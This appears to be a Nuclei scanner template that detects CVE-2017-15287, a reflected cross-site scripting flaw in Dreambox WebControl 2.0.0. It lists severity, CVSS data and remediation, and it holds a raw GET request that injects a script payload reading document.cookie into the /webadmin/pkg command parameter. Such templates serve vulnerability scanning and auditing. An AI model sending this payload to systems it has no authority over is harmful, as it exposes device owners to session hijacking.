Dreambox WebControl 2.0.0 - Cross-Site Scripting

id: CVE-2017-15287

info:
  name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
  reference:
    - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
    - https://www.exploit-db.com/exploits/42986/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15287
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-15287
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.47671
    cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
  metadata:
    max-request: 1
    vendor: bouqueteditor_project
    product: bouqueteditor
    framework: dreambox
  tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project

http:
  - raw:
      - |
        GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: word
        words:
          - 'Unknown command: <script>alert(document.cookie)</script>'
# digest: 4b0a00483046022100c0006e2859428861ac83e645dd91632ebad9b3a16a76fa2d38689f71ed1b7bea022100f1be24e96e715c1448270af7e94365b6ecda3ffb6dec61ccc86a133b922c0da8:922c64590222798bb761d5b6d8e72950